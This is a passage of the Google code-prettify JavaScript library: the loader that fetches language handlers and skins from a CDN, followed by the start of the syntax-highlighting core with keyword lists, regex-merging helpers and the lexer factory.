        value = decodeURIComponent(value);
        name = decodeURIComponent(name);
        if (name == 'autorun')   { autorun = !/^[0fn]/i.test(value); } else
        if (name == 'lang')      { langs.push(value);                } else
        if (name == 'skin')      { skins.push(value);                } else
        if (name == 'callback')  { callbacks.push(value);            }
      });

  // Use https to avoid mixed content warnings in client pages and to
  // prevent a MITM from rewrite prettify mid-flight.
  // This only works if this script is loaded via https : something
  // over which we exercise no control.
  var LOADER_BASE_URL =
     'https://cdn.rawgit.com/google/code-prettify/master/loader';

  for (var i = 0, n = langs.length; i < n; ++i) (function (lang) {
    var script = doc.createElement("script");

    // Excerpted from jQuery.ajaxTransport("script") to fire events when
    // a script is finished loading.
    // Attach handlers for each script
    script.onload = script.onerror = script.onreadystatechange = function () {
      if (script && (
            !script.readyState || /loaded|complete/.test(script.readyState))) {
        // Handle memory leak in IE
        script.onerror = script.onload = script.onreadystatechange = null;

        --pendingLanguages;
        checkPendingLanguages();

        // Remove the script
        if (script.parentNode) {
          script.parentNode.removeChild(script);
        }

        script = null;
      }
    };

    script.type = 'text/javascript';
    script.src = LOADER_BASE_URL
      + '/lang-' + encodeURIComponent(langs[i]) + '.js';

    // Circumvent IE6 bugs with base elements (#2709 and #4378) by prepending
    head.insertBefore(script, head.firstChild);
  })(langs[i]);

  var pendingLanguages = langs.length;
  function checkPendingLanguages() {
    if (!pendingLanguages) {
      win.setTimeout(onLangsLoaded, 0);
    }
  }

  var skinUrls = [];
  for (var i = 0, n = skins.length; i < n; ++i) {
    skinUrls.push(LOADER_BASE_URL
        + '/skins/' + encodeURIComponent(skins[i]) + '.css');
  }
  skinUrls.push(LOADER_BASE_URL + '/prettify.css');
  loadStylesheetsFallingBack(skinUrls);

  var prettyPrint = (function () {
    /**
     * @license
     * Copyright (C) 2006 Google Inc.
     *
     * Licensed under the Apache License, Version 2.0 (the "License");
     * you may not use this file except in compliance with the License.
     * You may obtain a copy of the License at
     *
     *      http://www.apache.org/licenses/LICENSE-2.0
     *
     * Unless required by applicable law or agreed to in writing, software
     * distributed under the License is distributed on an "AS IS" BASIS,
     * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     * See the License for the specific language governing permissions and
     * limitations under the License.
     */
    
    /**
     * @fileoverview
     * some functions for browser-side pretty printing of code contained in html.
     *
     * <p>
     * For a fairly comprehensive set of languages see the
     * <a href="https://github.com/google/code-prettify#for-which-languages-does-it-work">README</a>
     * file that came with this source.  At a minimum, the lexer should work on a
     * number of languages including C and friends, Java, Python, Bash, SQL, HTML,
     * XML, CSS, Javascript, and Makefiles.  It works passably on Ruby, PHP and Awk
     * and a subset of Perl, but, because of commenting conventions, doesn't work on
     * Smalltalk, Lisp-like, or CAML-like languages without an explicit lang class.
     * <p>
     * Usage: <ol>
     * <li> include this source file in an html page via
     *   {@code <script type="text/javascript" src="/path/to/prettify.js"></script>}
     * <li> define style rules.  See the example page for examples.
     * <li> mark the {@code <pre>} and {@code <code>} tags in your source with
     *    {@code class=prettyprint.}
     *    You can also use the (html deprecated) {@code <xmp>} tag, but the pretty
     *    printer needs to do more substantial DOM manipulations to support that, so
     *    some css styles may not be preserved.
     * </ol>
     * That's it.  I wanted to keep the API as simple as possible, so there's no
     * need to specify which language the code is in, but if you wish, you can add
     * another class to the {@code <pre>} or {@code <code>} element to specify the
     * language, as in {@code <pre class="prettyprint lang-java">}.  Any class that
     * starts with "lang-" followed by a file extension, specifies the file type.
     * See the "lang-*.js" files in this directory for code that implements
     * per-language file handlers.
     * <p>
     * Change log:<br>
     * cbeust, 2006/08/22
     * <blockquote>
     *   Java annotations (start with "@") are now captured as literals ("lit")
     * </blockquote>
     * @requires console
     */
    
    // JSLint declarations
    /*global console, document, navigator, setTimeout, window, define */
    
    
    /**
     * {@type !{
     *   'createSimpleLexer': function (Array, Array): (function (JobT)),
     *   'registerLangHandler': function (function (JobT), Array.<string>),
     *   'PR_ATTRIB_NAME': string,
     *   'PR_ATTRIB_NAME': string,
     *   'PR_ATTRIB_VALUE': string,
     *   'PR_COMMENT': string,
     *   'PR_DECLARATION': string,
     *   'PR_KEYWORD': string,
     *   'PR_LITERAL': string,
     *   'PR_NOCODE': string,
     *   'PR_PLAIN': string,
     *   'PR_PUNCTUATION': string,
     *   'PR_SOURCE': string,
     *   'PR_STRING': string,
     *   'PR_TAG': string,
     *   'PR_TYPE': string,
     *   'prettyPrintOne': function (string, string, number|boolean),
     *   'prettyPrint': function (?function, ?(HTMLElement|HTMLDocument))
     * }}
     * @const
     */
    var PR;
    
    /**
     * Split {@code prettyPrint} into multiple timeouts so as not to interfere with
     * UI events.
     * If set to {@code false}, {@code prettyPrint()} is synchronous.
     */
    window['PR_SHOULD_USE_CONTINUATION'] = true;
    
    /**
     * Pretty print a chunk of code.
     * @param {string} sourceCodeHtml The HTML to pretty print.
     * @param {string} opt_langExtension The language name to use.
     *     Typically, a filename extension like 'cpp' or 'java'.
     * @param {number|boolean} opt_numberLines True to number lines,
     *     or the 1-indexed number of the first line in sourceCodeHtml.
     * @return {string} code as html, but prettier
     */
    var prettyPrintOne;
    /**
     * Find all the {@code <pre>} and {@code <code>} tags in the DOM with
     * {@code class=prettyprint} and prettify them.
     *
     * @param {Function} opt_whenDone called when prettifying is done.
     * @param {HTMLElement|HTMLDocument} opt_root an element or document
     *   containing all the elements to pretty print.
     *   Defaults to {@code document.body}.
     */
    var prettyPrint;
    
    
    (function () {
      var win = window;
      // Keyword lists for various languages.
      // We use things that coerce to strings to make them compact when minified
      // and to defeat aggressive optimizers that fold large string constants.
      var FLOW_CONTROL_KEYWORDS = ["break,continue,do,else,for,if,return,while"];
      var C_KEYWORDS = [FLOW_CONTROL_KEYWORDS,"auto,case,char,const,default," +
          "double,enum,extern,float,goto,inline,int,long,register,short,signed," +
          "sizeof,static,struct,switch,typedef,union,unsigned,void,volatile"];
      var COMMON_KEYWORDS = [C_KEYWORDS,"catch,class,delete,false,import," +
          "new,operator,private,protected,public,this,throw,true,try,typeof"];
      var CPP_KEYWORDS = [COMMON_KEYWORDS,"alignof,align_union,asm,axiom,bool," +
          "concept,concept_map,const_cast,constexpr,decltype,delegate," +
          "dynamic_cast,explicit,export,friend,generic,late_check," +
          "mutable,namespace,nullptr,property,reinterpret_cast,static_assert," +
          "static_cast,template,typeid,typename,using,virtual,where"];
      var JAVA_KEYWORDS = [COMMON_KEYWORDS,
          "abstract,assert,boolean,byte,extends,finally,final,implements,import," +
          "instanceof,interface,null,native,package,strictfp,super,synchronized," +
          "throws,transient"];
      var CSHARP_KEYWORDS = [COMMON_KEYWORDS,
          "abstract,as,async,await,base,bool,by,byte,checked,decimal,delegate,descending," +
          "dynamic,event,finally,fixed,foreach,from,group,implicit,in,interface," +
          "internal,into,is,let,lock,null,object,out,override,orderby,params," +
          "partial,readonly,ref,sbyte,sealed,stackalloc,string,select,uint,ulong," +
          "unchecked,unsafe,ushort,var,virtual,where"];
      var COFFEE_KEYWORDS = "all,and,by,catch,class,else,extends,false,finally," +
          "for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then," +
          "throw,true,try,unless,until,when,while,yes";
      var JSCRIPT_KEYWORDS = [COMMON_KEYWORDS,
          "debugger,eval,export,function,get,instanceof,null,set,undefined," +
          "var,with,Infinity,NaN"];
      var PERL_KEYWORDS = "caller,delete,die,do,dump,elsif,eval,exit,foreach,for," +
          "goto,if,import,last,local,my,next,no,our,print,package,redo,require," +
          "sub,undef,unless,until,use,wantarray,while,BEGIN,END";
      var PYTHON_KEYWORDS = [FLOW_CONTROL_KEYWORDS, "and,as,assert,class,def,del," +
          "elif,except,exec,finally,from,global,import,in,is,lambda," +
          "nonlocal,not,or,pass,print,raise,try,with,yield," +
          "False,True,None"];
      var RUBY_KEYWORDS = [FLOW_CONTROL_KEYWORDS, "alias,and,begin,case,class," +
          "def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo," +
          "rescue,retry,self,super,then,true,undef,unless,until,when,yield," +
          "BEGIN,END"];
      var SH_KEYWORDS = [FLOW_CONTROL_KEYWORDS, "case,done,elif,esac,eval,fi," +
          "function,in,local,set,then,until"];
      var ALL_KEYWORDS = [
          CPP_KEYWORDS, CSHARP_KEYWORDS, JAVA_KEYWORDS, JSCRIPT_KEYWORDS,
          PERL_KEYWORDS, PYTHON_KEYWORDS, RUBY_KEYWORDS, SH_KEYWORDS];
      var C_TYPES = /^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)\b/;
    
      // token style names.  correspond to css classes
      /**
       * token style for a string literal
       * @const
       */
      var PR_STRING = 'str';
      /**
       * token style for a keyword
       * @const
       */
      var PR_KEYWORD = 'kwd';
      /**
       * token style for a comment
       * @const
       */
      var PR_COMMENT = 'com';
      /**
       * token style for a type
       * @const
       */
      var PR_TYPE = 'typ';
      /**
       * token style for a literal value.  e.g. 1, null, true.
       * @const
       */
      var PR_LITERAL = 'lit';
      /**
       * token style for a punctuation string.
       * @const
       */
      var PR_PUNCTUATION = 'pun';
      /**
       * token style for plain text.
       * @const
       */
      var PR_PLAIN = 'pln';
    
      /**
       * token style for an sgml tag.
       * @const
       */
      var PR_TAG = 'tag';
      /**
       * token style for a markup declaration such as a DOCTYPE.
       * @const
       */
      var PR_DECLARATION = 'dec';
      /**
       * token style for embedded source.
       * @const
       */
      var PR_SOURCE = 'src';
      /**
       * token style for an sgml attribute name.
       * @const
       */
      var PR_ATTRIB_NAME = 'atn';
      /**
       * token style for an sgml attribute value.
       * @const
       */
      var PR_ATTRIB_VALUE = 'atv';
    
      /**
       * A class that indicates a section of markup that is not code, e.g. to allow
       * embedding of line numbers within code listings.
       * @const
       */
      var PR_NOCODE = 'nocode';
    
      
      
      /**
       * A set of tokens that can precede a regular expression literal in
       * javascript
       * http://web.archive.org/web/20070717142515/http://www.mozilla.org/js/language/js20/rationale/syntax.html
       * has the full list, but I've removed ones that might be problematic when
       * seen in languages that don't support regular expression literals.
       *
       * <p>Specifically, I've removed any keywords that can't precede a regexp
       * literal in a syntactically legal javascript program, and I've removed the
       * "in" keyword since it's not a keyword in many languages, and might be used
       * as a count of inches.
       *
       * <p>The link above does not accurately describe EcmaScript rules since
       * it fails to distinguish between (a=++/b/i) and (a++/b/i) but it works
       * very well in practice.
       *
       * @private
       * @const
       */
      var REGEXP_PRECEDER_PATTERN = '(?:^^\\.?|[+-]|[!=]=?=?|\\#|%=?|&&?=?|\\(|\\*=?|[+\\-]=|->|\\/=?|::?|<<?=?|>>?>?=?|,|;|\\?|@|\\[|~|{|\\^\\^?=?|\\|\\|?=?|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\\s*';
      
      // CAVEAT: this does not properly handle the case where a regular
      // expression immediately follows another since a regular expression may
      // have flags for case-sensitivity and the like.  Having regexp tokens
      // adjacent is not valid in any language I'm aware of, so I'm punting.
      // TODO: maybe style special characters inside a regexp as punctuation.
    
      /**
       * Given a group of {@link RegExp}s, returns a {@code RegExp} that globally
       * matches the union of the sets of strings matched by the input RegExp.
       * Since it matches globally, if the input strings have a start-of-input
       * anchor (/^.../), it is ignored for the purposes of unioning.
       * @param {Array.<RegExp>} regexs non multiline, non-global regexs.
       * @return {RegExp} a global regex.
       */
      function combinePrefixPatterns(regexs) {
        var capturedGroupIndex = 0;
      
        var needToFoldCase = false;
        var ignoreCase = false;
        for (var i = 0, n = regexs.length; i < n; ++i) {
          var regex = regexs[i];
          if (regex.ignoreCase) {
            ignoreCase = true;
          } else if (/[a-z]/i.test(regex.source.replace(
                         /\\u[0-9a-f]{4}|\\x[0-9a-f]{2}|\\[^ux]/gi, ''))) {
            needToFoldCase = true;
            ignoreCase = false;
            break;
          }
        }
      
        var escapeCharToCodeUnit = {
          'b': 8,
          't': 9,
          'n': 0xa,
          'v': 0xb,
          'f': 0xc,
          'r': 0xd
        };
      
        function decodeEscape(charsetPart) {
          var cc0 = charsetPart.charCodeAt(0);
          if (cc0 !== 92 /* \\ */) {
            return cc0;
          }
          var c1 = charsetPart.charAt(1);
          cc0 = escapeCharToCodeUnit[c1];
          if (cc0) {
            return cc0;
          } else if ('0' <= c1 && c1 <= '7') {
            return parseInt(charsetPart.substring(1), 8);
          } else if (c1 === 'u' || c1 === 'x') {
            return parseInt(charsetPart.substring(2), 16);
          } else {
            return charsetPart.charCodeAt(1);
          }
        }
      
        function encodeEscape(charCode) {
          if (charCode < 0x20) {
            return (charCode < 0x10 ? '\\x0' : '\\x') + charCode.toString(16);
          }
          var ch = String.fromCharCode(charCode);
          return (ch === '\\' || ch === '-' || ch === ']' || ch === '^')
              ? "\\" + ch : ch;
        }
      
        function caseFoldCharset(charSet) {
          var charsetParts = charSet.substring(1, charSet.length - 1).match(
              new RegExp(
                  '\\\\u[0-9A-Fa-f]{4}'
                  + '|\\\\x[0-9A-Fa-f]{2}'
                  + '|\\\\[0-3][0-7]{0,2}'
                  + '|\\\\[0-7]{1,2}'
                  + '|\\\\[\\s\\S]'
                  + '|-'
                  + '|[^-\\\\]',
                  'g'));
          var ranges = [];
          var inverse = charsetParts[0] === '^';
      
          var out = ['['];
          if (inverse) { out.push('^'); }
      
          for (var i = inverse ? 1 : 0, n = charsetParts.length; i < n; ++i) {
            var p = charsetParts[i];
            if (/\\[bdsw]/i.test(p)) {  // Don't muck with named groups.
              out.push(p);
            } else {
              var start = decodeEscape(p);
              var end;
              if (i + 2 < n && '-' === charsetParts[i + 1]) {
                end = decodeEscape(charsetParts[i + 2]);
                i += 2;
              } else {
                end = start;
              }
              ranges.push([start, end]);
              // If the range might intersect letters, then expand it.
              // This case handling is too simplistic.
              // It does not deal with non-latin case folding.
              // It works for latin source code identifiers though.
              if (!(end < 65 || start > 122)) {
                if (!(end < 65 || start > 90)) {
                  ranges.push([Math.max(65, start) | 32, Math.min(end, 90) | 32]);
                }
                if (!(end < 97 || start > 122)) {
                  ranges.push([Math.max(97, start) & ~32, Math.min(end, 122) & ~32]);
                }
              }
            }
          }
      
          // [[1, 10], [3, 4], [8, 12], [14, 14], [16, 16], [17, 17]]
          // -> [[1, 12], [14, 14], [16, 17]]
          ranges.sort(function (a, b) { return (a[0] - b[0]) || (b[1]  - a[1]); });
          var consolidatedRanges = [];
          var lastRange = [];
          for (var i = 0; i < ranges.length; ++i) {
            var range = ranges[i];
            if (range[0] <= lastRange[1] + 1) {
              lastRange[1] = Math.max(lastRange[1], range[1]);
            } else {
              consolidatedRanges.push(lastRange = range);
            }
          }
      
          for (var i = 0; i < consolidatedRanges.length; ++i) {
            var range = consolidatedRanges[i];
            out.push(encodeEscape(range[0]));
            if (range[1] > range[0]) {
              if (range[1] + 1 > range[0]) { out.push('-'); }
              out.push(encodeEscape(range[1]));
            }
          }
          out.push(']');
          return out.join('');
        }
      
        function allowAnywhereFoldCaseAndRenumberGroups(regex) {
          // Split into character sets, escape sequences, punctuation strings
          // like ('(', '(?:', ')', '^'), and runs of characters that do not
          // include any of the above.
          var parts = regex.source.match(
              new RegExp(
                  '(?:'
                  + '\\[(?:[^\\x5C\\x5D]|\\\\[\\s\\S])*\\]'  // a character set
                  + '|\\\\u[A-Fa-f0-9]{4}'  // a unicode escape
                  + '|\\\\x[A-Fa-f0-9]{2}'  // a hex escape
                  + '|\\\\[0-9]+'  // a back-reference or octal escape
                  + '|\\\\[^ux0-9]'  // other escape sequence
                  + '|\\(\\?[:!=]'  // start of a non-capturing group
                  + '|[\\(\\)\\^]'  // start/end of a group, or line start
                  + '|[^\\x5B\\x5C\\(\\)\\^]+'  // run of other characters
                  + ')',
                  'g'));
          var n = parts.length;
      
          // Maps captured group numbers to the number they will occupy in
          // the output or to -1 if that has not been determined, or to
          // undefined if they need not be capturing in the output.
          var capturedGroups = [];
      
          // Walk over and identify back references to build the capturedGroups
          // mapping.
          for (var i = 0, groupIndex = 0; i < n; ++i) {
            var p = parts[i];
            if (p === '(') {
              // groups are 1-indexed, so max group index is count of '('
              ++groupIndex;
            } else if ('\\' === p.charAt(0)) {
              var decimalValue = +p.substring(1);
              if (decimalValue) {
                if (decimalValue <= groupIndex) {
                  capturedGroups[decimalValue] = -1;
                } else {
                  // Replace with an unambiguous escape sequence so that
                  // an octal escape sequence does not turn into a backreference
                  // to a capturing group from an earlier regex.
                  parts[i] = encodeEscape(decimalValue);
                }
              }
            }
          }
      
          // Renumber groups and reduce capturing groups to non-capturing groups
          // where possible.
          for (var i = 1; i < capturedGroups.length; ++i) {
            if (-1 === capturedGroups[i]) {
              capturedGroups[i] = ++capturedGroupIndex;
            }
          }
          for (var i = 0, groupIndex = 0; i < n; ++i) {
            var p = parts[i];
            if (p === '(') {
              ++groupIndex;
              if (!capturedGroups[groupIndex]) {
                parts[i] = '(?:';
              }
            } else if ('\\' === p.charAt(0)) {
              var decimalValue = +p.substring(1);
              if (decimalValue && decimalValue <= groupIndex) {
                parts[i] = '\\' + capturedGroups[decimalValue];
              }
            }
          }
      
          // Remove any prefix anchors so that the output will match anywhere.
          // ^^ really does mean an anchored match though.
          for (var i = 0; i < n; ++i) {
            if ('^' === parts[i] && '^' !== parts[i + 1]) { parts[i] = ''; }
          }
      
          // Expand letters to groups to handle mixing of case-sensitive and
          // case-insensitive patterns if necessary.
          if (regex.ignoreCase && needToFoldCase) {
            for (var i = 0; i < n; ++i) {
              var p = parts[i];
              var ch0 = p.charAt(0);
              if (p.length >= 2 && ch0 === '[') {
                parts[i] = caseFoldCharset(p);
              } else if (ch0 !== '\\') {
                // TODO: handle letters in numeric escapes.
                parts[i] = p.replace(
                    /[a-zA-Z]/g,
                    function (ch) {
                      var cc = ch.charCodeAt(0);
                      return '[' + String.fromCharCode(cc & ~32, cc | 32) + ']';
                    });
              }
            }
          }
      
          return parts.join('');
        }
      
        var rewritten = [];
        for (var i = 0, n = regexs.length; i < n; ++i) {
          var regex = regexs[i];
          if (regex.global || regex.multiline) { throw new Error('' + regex); }
          rewritten.push(
              '(?:' + allowAnywhereFoldCaseAndRenumberGroups(regex) + ')');
        }
      
        return new RegExp(rewritten.join('|'), ignoreCase ? 'gi' : 'g');
      }
    
      /**
       * Split markup into a string of source code and an array mapping ranges in
       * that string to the text nodes in which they appear.
       *
       * <p>
       * The HTML DOM structure:</p>
       * <pre>
       * (Element   "p"
       *   (Element "b"
       *     (Text  "print "))       ; #1
       *   (Text    "'Hello '")      ; #2
       *   (Element "br")            ; #3
       *   (Text    "  + 'World';")) ; #4
       * </pre>
       * <p>
       * corresponds to the HTML
       * {@code <p><b>print </b>'Hello '<br>  + 'World';</p>}.</p>
       *
       * <p>
       * It will produce the output:</p>
       * <pre>
       * {
       *   sourceCode: "print 'Hello '\n  + 'World';",
       *   //                     1          2
       *   //           012345678901234 5678901234567
       *   spans: [0, #1, 6, #2, 14, #3, 15, #4]
       * }
       * </pre>
       * <p>
       * where #1 is a reference to the {@code "print "} text node above, and so
       * on for the other text nodes.
       * </p>
       *
       * <p>
       * The {@code} spans array is an array of pairs.  Even elements are the start
       * indices of substrings, and odd elements are the text nodes (or BR elements)
       * that contain the text for those substrings.
       * Substrings continue until the next index or the end of the source.
       * </p>
       *
       * @param {Node} node an HTML DOM subtree containing source-code.
       * @param {boolean|number} isPreformatted truthy if white-space in
       *    text nodes should be considered significant.
       * @return {SourceSpansT} source code and the nodes in which they occur.
       */
      function extractSourceSpans(node, isPreformatted) {
        var nocode = /(?:^|\s)nocode(?:\s|$)/;
      
        var chunks = [];
        var length = 0;
        var spans = [];
        var k = 0;
      
        function walk(node) {
          var type = node.nodeType;
          if (type == 1) {  // Element
            if (nocode.test(node.className)) { return; }
            for (var child = node.firstChild; child; child = child.nextSibling) {
              walk(child);
            }
            var nodeName = node.nodeName.toLowerCase();
            if ('br' === nodeName || 'li' === nodeName) {
              chunks[k] = '\n';
              spans[k << 1] = length++;
              spans[(k++ << 1) | 1] = node;
            }
          } else if (type == 3 || type == 4) {  // Text
            var text = node.nodeValue;
            if (text.length) {
              if (!isPreformatted) {
                text = text.replace(/[ \t\r\n]+/g, ' ');
              } else {
                text = text.replace(/\r\n?/g, '\n');  // Normalize newlines.
              }
              // TODO: handle tabs here?
              chunks[k] = text;
              spans[k << 1] = length;
              length += text.length;
              spans[(k++ << 1) | 1] = node;
            }
          }
        }
      
        walk(node);
      
        return {
          sourceCode: chunks.join('').replace(/\n$/, ''),
          spans: spans
        };
      }
    
      /**
       * Apply the given language handler to sourceCode and add the resulting
       * decorations to out.
       * @param {!Element} sourceNode
       * @param {number} basePos the index of sourceCode within the chunk of source
       *    whose decorations are already present on out.
       * @param {string} sourceCode
       * @param {function(JobT)} langHandler
       * @param {DecorationsT} out
       */
      function appendDecorations(
          sourceNode, basePos, sourceCode, langHandler, out) {
        if (!sourceCode) { return; }
        /** @type {JobT} */
        var job = {
          sourceNode: sourceNode,
          pre: 1,
          langExtension: null,
          numberLines: null,
          sourceCode: sourceCode,
          spans: null,
          basePos: basePos,
          decorations: null
        };
        langHandler(job);
        out.push.apply(out, job.decorations);
      }
    
      var notWs = /\S/;
    
      /**
       * Given an element, if it contains only one child element and any text nodes
       * it contains contain only space characters, return the sole child element.
       * Otherwise returns undefined.
       * <p>
       * This is meant to return the CODE element in {@code <pre><code ...>} when
       * there is a single child element that contains all the non-space textual
       * content, but not to return anything where there are multiple child elements
       * as in {@code <pre><code>...</code><code>...</code></pre>} or when there
       * is textual content.
       */
      function childContentWrapper(element) {
        var wrapper = undefined;
        for (var c = element.firstChild; c; c = c.nextSibling) {
          var type = c.nodeType;
          wrapper = (type === 1)  // Element Node
              ? (wrapper ? element : c)
              : (type === 3)  // Text Node
              ? (notWs.test(c.nodeValue) ? element : wrapper)
              : wrapper;
        }
        return wrapper === element ? undefined : wrapper;
      }
    
      /** Given triples of [style, pattern, context] returns a lexing function,
        * The lexing function interprets the patterns to find token boundaries and
        * returns a decoration list of the form
        * [index_0, style_0, index_1, style_1, ..., index_n, style_n]
        * where index_n is an index into the sourceCode, and style_n is a style
        * constant like PR_PLAIN.  index_n-1 <= index_n, and style_n-1 applies to
        * all characters in sourceCode[index_n-1:index_n].
        *
        * The stylePatterns is a list whose elements have the form
        * [style : string, pattern : RegExp, DEPRECATED, shortcut : string].
        *
        * Style is a style constant like PR_PLAIN, or can be a string of the
        * form 'lang-FOO', where FOO is a language extension describing the
        * language of the portion of the token in $1 after pattern executes.
        * E.g., if style is 'lang-lisp', and group 1 contains the text
        * '(hello (world))', then that portion of the token will be passed to the
        * registered lisp handler for formatting.
        * The text before and after group 1 will be restyled using this decorator
        * so decorators should take care that this doesn't result in infinite
        * recursion.  For example, the HTML lexer rule for SCRIPT elements looks
        * something like ['lang-js', /<[s]cript>(.+?)<\/script>/].  This may match
        * '<script>foo()<\/script>', which would cause the current decorator to
        * be called with '<script>' which would not match the same rule since
        * group 1 must not be empty, so it would be instead styled as PR_TAG by
        * the generic tag rule.  The handler registered for the 'js' extension would
        * then be called with 'foo()', and finally, the current decorator would
        * be called with '<\/script>' which would not match the original rule and
        * so the generic tag rule would identify it as a tag.
        *
        * Pattern must only match prefixes, and if it matches a prefix, then that
        * match is considered a token with the same style.
        *
        * Context is applied to the last non-whitespace, non-comment token
        * recognized.
        *
        * Shortcut is an optional string of characters, any of which, if the first
        * character, gurantee that this pattern and only this pattern matches.
        *
        * @param {Array} shortcutStylePatterns patterns that always start with
        *   a known character.  Must have a shortcut string.
        * @param {Array} fallthroughStylePatterns patterns that will be tried in
        *   order if the shortcut ones fail.  May have shortcuts.
        *
        * @return {function (JobT)} a function that takes an undecorated job and
        *   attaches a list of decorations.
        */
      function createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns) {
        var shortcuts = {};
        var tokenizer;
        (function () {
          var allPatterns = shortcutStylePatterns.concat(fallthroughStylePatterns);
          var allRegexs = [];
          var regexKeys = {};
          for (var i = 0, n = allPatterns.length; i < n; ++i) {
            var patternParts = allPatterns[i];
            var shortcutChars = patternParts[3];
            if (shortcutChars) {
              for (var c = shortcutChars.length; --c >= 0;) {
                shortcuts[shortcutChars.charAt(c)] = patternParts;
              }
            }
            var regex = patternParts[1];
            var k = '' + regex;
            if (!regexKeys.hasOwnProperty(k)) {
              allRegexs.push(regex);
              regexKeys[k] = null;
            }
          }
          allRegexs.push(/[\0-\uffff]/);
          tokenizer = combinePrefixPatterns(allRegexs);
        })();
    
        var nPatterns = fallthroughStylePatterns.length;
    
        /**
         * Lexes job.sourceCode and attaches an output array job.decorations of
         * style classes preceded by the position at which they start in
         * job.sourceCode in order.
         *
         * @type{function (JobT)}
         */
        var decorate = function (job) {
          var sourceCode = job.sourceCode, basePos = job.basePos;
          var sourceNode = job.sourceNode;
          /** Even entries are positions in source in ascending order.  Odd enties
            * are style markers (e.g., PR_COMMENT) that run from that position until
            * the end.
            * @type {DecorationsT}
            */
          var decorations = [basePos, PR_PLAIN];
          var pos = 0;  // index into sourceCode
          var tokens = sourceCode.match(tokenizer) || [];
          var styleCache = {};
    
          for (var ti = 0, nTokens = tokens.length; ti < nTokens; ++ti) {
            var token = tokens[ti];
            var style = styleCache[token];
            var match = void 0;
    
            var isEmbedded;
            if (typeof style === 'string') {
              isEmbedded = false;
            } else {
              var patternParts = shortcuts[token.charAt(0)];
              if (patternParts) {
                match = token.match(patternParts[1]);
                style = patternParts[0];
              } else {
                for (var i = 0; i < nPatterns; ++i) {
                  patternParts = fallthroughStylePatterns[i];
                  match = token.match(patternParts[1]);
                  if (match) {
                    style = patternParts[0];
                    break;
                  }
                }
    
                if (!match) {  // make sure that we make progress
                  style = PR_PLAIN;
                }
              }
    
              isEmbedded = style.length >= 5 && 'lang-' === style.substring(0, 5);
              if (isEmbedded && !(match && typeof match[1] === 'string')) {
                isEmbedded = false;
                style = PR_SOURCE;
              }
    
              if (!isEmbedded) { styleCache[token] = style; }
            }
    
            var tokenStart = pos;
            pos += token.length;
    
            if (!isEmbedded) {
              decorations.push(basePos + tokenStart, style);
            } else {  // Treat group 1 as an embedded block of source code.
              var embeddedSource = match[1];
              var embeddedSourceStart = token.indexOf(embeddedSource);
              var embeddedSourceEnd = embeddedSourceStart + embeddedSource.length;
              if (match[2]) {
                // If embeddedSource can be blank, then it would match at the
                // beginning which would cause us to infinitely recurse on the
                // entire token, so we catch the right context in match[2].
                embeddedSourceEnd = token.length - match[2].length;
                embeddedSourceStart = embeddedSourceEnd - embeddedSource.length;
              }
              var lang = style.substring(5);
              // Decorate the left of the embedded source
              appendDecorations(
                  sourceNode,
                  basePos + tokenStart,
                  token.substring(0, embeddedSourceStart),
                  decorate, decorations);
              // Decorate the embedded source
              appendDecorations(
                  sourceNode,
                  basePos + tokenStart + embeddedSourceStart,
                  embeddedSource,
                  langHandlerForExtension(lang, embeddedSource),
                  decorations);
              // Decorate the right of the embedded section
              appendDecorations(
                  sourceNode,
                  basePos + tokenStart + embeddedSourceEnd,
                  token.substring(embeddedSourceEnd),
                  decorate, decorations);
            }
          }
          job.decorations = decorations;
        };
        return decorate;
      }
    
      /** returns a function that produces a list of decorations from source text.
        *
        * This code treats ", ', and ` as string delimiters, and \ as a string
        * escape.  It does not recognize perl's qq() style strings.
        * It has no special handling for double delimiter escapes as in basic, or
        * the tripled delimiters used in python, but should work on those regardless
        * although in those cases a single string literal may be broken up into
        * multiple adjacent string literals.
        *
        * It recognizes C, C++, and shell style comments.
        *
        * @param {Object} options a set of optional parameters.
        * @return {function (JobT)} a function that examines the source code
        *     in the input job and builds a decoration list which it attaches to
        *     the job.
        */
      function sourceDecorator(options) {
        var shortcutStylePatterns = [], fallthroughStylePatterns = [];
        if (options['tripleQuotedStrings']) {
          // '''multi-line-string''', 'single-line-string', and double-quoted
          shortcutStylePatterns.push(
              [PR_STRING,  /^(?:\'\'\'(?:[^\'\\]|\\[\s\S]|\'{1,2}(?=[^\']))*(?:\'\'\'|$)|\"\"\"(?:[^\"\\]|\\[\s\S]|\"{1,2}(?=[^\"]))*(?:\"\"\"|$)|\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$))/,
               null, '\'"']);
        } else if (options['multiLineStrings']) {
          // 'multi-line-string', "multi-line-string"
          shortcutStylePatterns.push(
              [PR_STRING,  /^(?:\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$)|\`(?:[^\\\`]|\\[\s\S])*(?:\`|$))/,
               null, '\'"`']);
        } else {
          // 'single-line-string', "single-line-string"
          shortcutStylePatterns.push(
              [PR_STRING,
               /^(?:\'(?:[^\\\'\r\n]|\\.)*(?:\'|$)|\"(?:[^\\\"\r\n]|\\.)*(?:\"|$))/,
               null, '"\'']);
        }
        if (options['verbatimStrings']) {
          // verbatim-string-literal production from the C# grammar.  See issue 93.
          fallthroughStylePatterns.push(
              [PR_STRING, /^@\"(?:[^\"]|\"\")*(?:\"|$)/, null]);
        }
        var hc = options['hashComments'];
        if (hc) {
          if (options['cStyleComments']) {
            if (hc > 1) {  // multiline hash comments
              shortcutStylePatterns.push(
                  [PR_COMMENT, /^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/, null, '#']);
            } else {
              // Stop C preprocessor declarations at an unclosed open comment
              shortcutStylePatterns.push(
                  [PR_COMMENT, /^#(?:(?:define|e(?:l|nd)if|else|error|ifn?def|include|line|pragma|undef|warning)\b|[^\r\n]*)/,
                   null, '#']);
            }
            // #include <stdio.h>
            fallthroughStylePatterns.push(
                [PR_STRING,
                 /^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h(?:h|pp|\+\+)?|[a-z]\w*)>/,
                 null]);
          } else {
